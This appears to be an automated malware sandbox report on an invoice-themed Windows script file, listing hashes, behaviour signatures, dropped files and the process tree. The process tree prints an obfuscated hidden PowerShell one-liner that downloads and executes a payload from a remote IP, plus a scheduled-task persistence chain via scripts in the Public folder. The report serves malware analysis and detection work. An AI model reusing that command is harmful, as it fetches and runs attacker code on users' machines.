Analysis
-
max time kernel
128s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20231020-en -
resource tags
arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system -
submitted
15/11/2023, 17:36
Static task
static1
Behavioral task
behavioral1
Sample
16112023_0136_15112023_Invoice#2356876431.wsf
Resource
win7-20231020-en
General
-
Target
16112023_0136_15112023_Invoice#2356876431.wsf
-
Size
21KB
-
MD5
5d9bc7257648e766a56fa284fc93eb54
-
SHA1
5ec96df82f7290ef18b15ce048e2f0cf49af523b
-
SHA256
ce81111e3d8f1946ce876b32908560f51f3d43ab7e74706649e623462cada292
-
SHA512
ada4abe483fb6df5422fb96f615e6fc67f08939d3d89a6ff2ad7b3f6e291a613789aa4b89925bbe9c450ba07b5f746dbe62b36cd25c3b28468c41d88fe9f1e06
-
SSDEEP
384:taaaaaaaaaaauaaaaaaaaaaaVaaaaaaaaaaal0/OlaaaaaaaaaaaJaaaaaaaaaa9:taaaaaaaaaaauaaaaaaaaaaaVaaaaaaF
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 1684 WScript.exe 5 1976 powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1976 powershell.exe 2860 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1976 powershell.exe Token: SeDebugPrivilege 2860 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1684 wrote to memory of 1976 1684 WScript.exe 28 PID 1684 wrote to memory of 1976 1684 WScript.exe 28 PID 1684 wrote to memory of 1976 1684 WScript.exe 28 PID 2200 wrote to memory of 268 2200 taskeng.exe 34 PID 2200 wrote to memory of 268 2200 taskeng.exe 34 PID 2200 wrote to memory of 268 2200 taskeng.exe 34 PID 268 wrote to memory of 2936 268 WScript.exe 35 PID 268 wrote to memory of 2936 268 WScript.exe 35 PID 268 wrote to memory of 2936 268 WScript.exe 35 PID 2936 wrote to memory of 2860 2936 cmd.exe 37 PID 2936 wrote to memory of 2860 2936 cmd.exe 37 PID 2936 wrote to memory of 2860 2936 cmd.exe 37 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\16112023_0136_15112023_Invoice#2356876431.wsf"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1684 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/-/--/-/(''http://185.81.157.213:222/8X.jpg'')'.RePLACe('/-/--/-/','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1976
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {04BBFF73-310B-4225-8D31-ECFFDE1F3BAA} S-1-5-21-2084844033-2744876406-2053742436-1000:GGPVHMXR\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:2200 -
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Public\Conted.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:268 -
C:\Windows\System32\cmd.execmd /c ""C:\Users\Public\Conted.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:2936 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\Conted.ps1'"4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2860
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5ac117302088a7284ccfb6957fc077861
SHA1220d28d0668f1e28ac909561699636c848cd408e
SHA25669154fb9bbdd28ec9c76d63ef9951ccb79ddcf4d37bb7e8d541a350ad979ab80
SHA512f71021ad06ea17ddc3f619b196417afd96543a6613ff728038a588ba50651e434c6bb1f3c92f3e9d39fc0b401e7177e7dbcb222bccd93aa2caaca39d631865a4
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZAWLLO1RJ69GAIO7DTX2.temp
Filesize7KB
MD5d82ad5696b449dbe82226c731261a824
SHA1385f9e07d795046e2d7ee64a8078166fb5a56326
SHA2560b2fa9154e3620d3417a0adb0f90f530dc5d5866292a5bcaa3fbb50c41563348
SHA51224721b2fb8fd37b0736ff97a6640647d17af6c05c928db8e1b816cda1ce2c706bb6ef53901565af2af44db1f1d289a1567cb39dd65deff7de6297bdc2f605aef
-
Filesize
205B
MD5759278dd3dc3679bf7efd1ec681c0aa1
SHA172b37494696deea940ac75b4c4e06e2b6ce419ef
SHA256cba344447d8228d88c93d64ffdcda1de8562ef41adc4901191548e00bbfc5f19
SHA5128b4f63354c5aa1ec4102e7aadbb2da34b2a0ba2d3ae6b8d22a70fd75c3c3b9e70cd4ce8128bd50cb400970697c49810c4ef69f96352e36ba4f2b7a647ab8a27f
-
Filesize
688B
MD5110da9d3474ba64fa1a18c173685c25d
SHA19f093829518a9268bf9807fda7bef47e7832c497
SHA256a31dbd6f7416f150403c19be69f02d5e8608f5e7fae88a29831d40db15849b60
SHA512ef5fb4415fbd12e633ad964ca132ac3be81bfacd489db788b86fc7ef245d6f51bc08faecaf24874649d0c754b1892075a28042bf8483ab85b1996a25cfa57443